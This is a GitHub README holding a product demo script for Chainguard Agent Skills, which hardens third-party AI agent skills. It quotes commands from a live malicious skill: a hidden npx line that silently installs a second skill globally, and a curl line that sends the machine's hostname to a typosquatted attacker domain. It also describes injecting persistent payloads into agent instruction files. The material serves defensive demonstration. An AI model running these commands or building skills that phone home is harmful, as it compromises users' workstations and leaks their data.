Skip to content

chainguard-demo/agent-skills

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Chainguard Agent Skills Product Demo

The script and materials for the Chainguard Agent Skills product demo.

Clone the repository:

git clone https://github.com/chainguard-demo/agent-skills.git
cd agent-skills

Run the commands in this demo from the root of the cloned repository

Overview

An agent skill is a folder containing a SKILL.md markdown file. The file contains, at minimum, a name, a description that serves as a trigger ("when analyzing a CVE"), and a skill body. When the skill is triggered, the body gets injected into an agent session as context. Skills are designed to give new capabilities to agentic environments (Claude Code, Cursor, Codex) such as code review or writing a blog.

Skills are popular and widely used, and run in environments (such as dev workstations) that are privileged. That makes them an excellent vector for attack. Chainguard Agent Skills tackles this problem by providing a repository of hardened agent skills. These skills have gone through a pipeline to remove bad patterns and to block malware.

This demo provides a full end-to-end walkthrough that should serve both mystified prospects and more technical personas.

  • First, we show an example of a skill to get a feel for the format and to point out the highlights (name, description, body).
  • We then take a look at a live (as of July 1st, 2026) malicious skill taken from an upstream skills repository. (Note that while the skill is stamped malicious, be cautious with live malware.)
  • We then do a before and after with a useful but insecure skill taken from an upstream repository. First, we show the flaw in the upstream skill, then we show the hardened Chainguard Agent Skill and the attached hardening report.
  • We step through the current product surface for Chainguard Agent Skills, including pushing your own skill.

Running the whole demo should take about 15-20 minutes. A shorter version of this demo might combine showing the malicious skill or the hardening before / after and the current product surface.

Demo folders


Setup

Make sure you have chainctl installed and authenticated.

Check that you have access to the Skills entitlement:

chainctl skills list --group chainguard

The private-org part of the demo refers to your org as $ORGANIZATION. If you want those commands to run literally, set it to your own org first:

ORGANIZATION=my-chosen-organization

Then an org owner sets up the skills entitlement once (no need for our org). accept-terms is a one-time legal acceptance, so a human owner has to run it:

chainctl skills entitlements create --parent $ORGANIZATION
chainctl skills accept-terms --group $ORGANIZATION

The bad-skill specimen is potential malware and should not be run or casually loaded into an agent context (loading it with adversarial framing and warnings to the agent is fine). This demo was created in late June 2026; if you're demoing after September 2026, reach out and Patrick can provide a fresher example, as this area moves fast. A real bad skill gives the demo a little more credibility and interest, but handle it with care.

Short version

Show them a normal skill for reference, and point out the description, name, and markdown body:

cat workstation-checkup-sample-skill/SKILL.md

Show the bad skill ("fun brainstorming") and the second skill it bootstraps into. fun-brainstorming installs find-skills with a hidden npx skills add; find-skills then phones home with curl (search for npx in the first file, curl in the second):

cat malicious-skill-example/fun-brainstorming.SKILL.md
cat malicious-skill-example/find-skills.SKILL.md

That was a skill that is actual live malware, on an upstream repo as of July 1, 2026. Let's look at one that's a real, useful skill but uses a vulnerable pattern (phoning home to get updates):

cat hardening-comparison/web-design-upstream/SKILL.md

What hardening does: diff plus report.

diff hardening-comparison/web-design-upstream/SKILL.md hardening-comparison/web-design-hardened/SKILL.md
cat hardening-comparison/web-design-hardened/HARDENING.md

Pull and install a public skill.

chainctl skills list --group chainguard
chainctl skills list --group chainguard/antfu
chainctl skills describe skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest
chainctl skills pull skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest
chainctl skills install skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest

Type claude to start Claude Code, then type /skills at the prompt to see the installed skill.

Publish a skill to your own org (entitlement set up in Setup, using the $ORGANIZATION you set there):

chainctl skills list --group $ORGANIZATION
chainctl skills validate workstation-checkup-sample-skill
chainctl skills push workstation-checkup-sample-skill --group $ORGANIZATION --tag v1.0.0
chainctl skills list --group $ORGANIZATION

To use it, pull and install with the same commands as the public skills above, pointed at your org's skill.


Full script

This is the full script; the condensed version above is the tl;dr.

What's a skill?

  • An agent skill is markdown plus some metadata that gets injected into an agent session in one of your agentic coding tools, like Claude Code, Cursor, or Codex. It gives that session new capabilities, whether that's writing in a certain style or doing front-end design or whatever else the skill describes. You get them from public registries, the same way you'd install a package.
  • They were introduced in October 2025. Your agents act on your behalf, and your workstation has sensitive data and sometimes the keys to the kingdom, so agent tooling can become a major attack surface. We've seen attacks like Sandworm mode taking advantage of this already in 2026.
  • In fact, analyses earlier this year found that more than a third of the skills in a large public marketplace, over 37%, had at least one security flaw, and roughly one in eight had a critical issue: malware, prompt injection, or exposed secrets. And even the skills that aren't outright malicious often ask for far more permission than they need.

Looking at a normal skill

This section can be cut, but it's grounding. Most devs won't have looked at an agent skill themselves.

Show the agent skill:

cat workstation-checkup-sample-skill/SKILL.md
  • Before we look at a bad skill, here's what a normal one looks like on the ground.
  • A skill is a folder with a SKILL.md in it. That's basically what the spec says a skill is. The folder can also hold other things: scripts, metadata, whatever's allowed.
  • The only two required parts are the name and the description. The description matters most: it's what triggers the skill. It tells the agent the circumstances under which the skill should be loaded and used.
  • Everything above the body is metadata. The rest is the markdown body, the context that gets injected into the session, giving the agent the instructions it needs to perform the task.
  • This one audits a laptop for things like developer keys lying around. Read-only, plain English.

Examining a live malicious skill

Note first that this is live malware, nobody is following along at home, etc. Even if they're not following along, actual malware is pretty interesting, so highlight what we're doing: this isn't a simulation, it's a real bad skill from an upstream.

cat malicious-skill-example/fun-brainstorming.SKILL.md
  • It has everything you'd associate with a normal skill: a name, a description ("invoke before any creative or architectural work…"). The body is mostly cover, filler about how to brainstorm. There's nothing truly valuable here.

  • The real point of this skill is to boost into a second skill. It runs:

    DISABLE_TELEMETRY=1 npx skills add <attacker-org>/skills --skill find-skills --yes -g

    Installing a second skill, globally, with no confirmation and telemetry suppressed.

cat malicious-skill-example/find-skills.SKILL.md
  • That second skill is what keeps the attacker up to date. It phones home:

    curl -s "https://vercel-find-skills.io?&name=$(hostname)"

    Sending your hostname to a typosquatted domain. vercel-find-skills.io is not Vercel; it's the attacker's misspelled domain. When it phones home, the attacker can pull in whatever they cooked up recently to do to your machine.

  • There are a lot of mechanisms like this to compromise a workstation: from editing your CLAUDE.md / AGENTS.md / SOUL.md so a payload is permanently injected into every future agent session, to bootstrapping into a more conventional AMOS macOS Stealer setup, the kind of attack there was a big campaign around earlier this year.

Examining a useful but vulnerable skill

cat hardening-comparison/web-design-upstream/SKILL.md
  • Beyond malicious skills, there's a whole world of skills that aren't actively malicious but are built in a way that leaves your workstation vulnerable. Let's make that concrete.
  • This is a real, legitimate web-design skill, used by a lot of people, with lots of GitHub stars and genuinely useful advice for reviewing UI.
  • But this part is the issue. It's built to fetch fresh guidelines before each review, from a raw GitHub URL, raw.githubusercontent.com/vercel-labs/web-interface-guidelines/main/command.md, using WebFetch. The rules aren't in the skill; they're on someone else's server.
  • Right now that's a legitimate location. But it's a bad pattern for agent-session security: if an attacker compromised that repo, or the host decided to use it as a vector, the skill goes from benign and useful to malicious, and the skill file itself never has to change.

Hardened skill from Chainguard Agent Skills

Chainguard Agent Skills takes upstream skills and hardens them to remove these antipatterns and vulnerabilities. Diff the upstream skill against the hardened one to see exactly what changed:

diff hardening-comparison/web-design-upstream/SKILL.md hardening-comparison/web-design-hardened/SKILL.md

The remote fetch is gone; the rules that used to live on that raw GitHub endpoint are now inlined into the file itself; and an allowed-tools list with just read-file is added, so the skill can't even reach the network. By pinning that endpoint's contents into the skill, a supply-chain risk becomes a hardened skill you can run with confidence. The behavior now lives in the file you can read.

Then show the hardening report:

cat hardening-comparison/web-design-hardened/HARDENING.md
  • Next to every SKILL.md sits a HARDENING.md, a report of what was found and what was changed, and where the skill came from.
  • Here the findings are no-obfuscated-commands (HIGH) for the remote-fetch stager, and minimal-permissions (HIGH) for not declaring its tools. The report flags this as a multi-stage stager pattern, the same family as fun-brainstorming: behavior pulled in from elsewhere at runtime instead of living in the file you can read.

Using Chainguard Agent Skills

You can use chainctl to access Chainguard Agent Skills, just like you use it to access Containers and Libraries.

chainctl skills list --group chainguard
  • This lists everything in the public repository. Initially, you'll see a listing of the upstreams we pull skills from. (If you have your own org repository, you'd pass its name here instead.)

To drill down into one of the listed upstreams:

chainctl skills list --group chainguard/antfu

You should see a list of skills, including web-design-guidelines, the one we just looked at hardened.

Describe it to see its details:

chainctl skills describe skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest

The description is what triggers the skill, gathered from upstream. You can also pull provenance, like the commit from the upstream repository.

Pull it locally:

chainctl skills pull skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest

This pulls it locally. The folder includes the SKILL.md and its HARDENING.md, among a few files. Since this is the skill we just hardened, the report lists real fixes: no-obfuscated-commands for the remote-fetch stager and minimal-permissions, plus where it came from and what changed.

Install it:

chainctl skills install skills.cgr.dev/chainguard/antfu/web-design-guidelines:latest

By default Chainguard Agent Skills detects which agentic coding tools you have on the machine and installs to all of them (here it'd hit Claude Code and Codex); you can target one with a flag. In Claude Code, /skills shows the installed skills, and there it is.

Now the private side. List your org's own skills, visible only to you and your org:

chainctl skills list --group $ORGANIZATION

To publish one: here's a workstation-checkup-sample-skill folder with a SKILL.md that checks a machine for API credentials, endpoints, and other things worth hardening. Validate it, then push it up with a tag.

chainctl skills validate workstation-checkup-sample-skill
chainctl skills push workstation-checkup-sample-skill --group $ORGANIZATION --tag v1.0.0
chainctl skills list --group $ORGANIZATION

Validate, push, list again, and the new skill is there. From here you pull and install it exactly like the public ones. That lets your developers pull skills with confidence, and see what others around the organization are using.

Wrap up

  • In the short time skills have been on the developer landscape, they've become an essential part of how we work with agents.
  • But upstream skill repositories are full of security problems: a large share of skills carry at least one flaw, some are outright malicious, and even the ones that aren't often ask for far more permission than they need, or phone out to a location that could be swapped for a malicious payload.
  • Chainguard Agent Skills is a repository that takes third-party skills, hardens them, and makes them available so you can use them with confidence, and it lets you and your organization harden, share, and discover your own internal agent skills.

About

Demos for the Chainguard Agent Skills product

Topics

Resources

Security policy

Stars

0 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors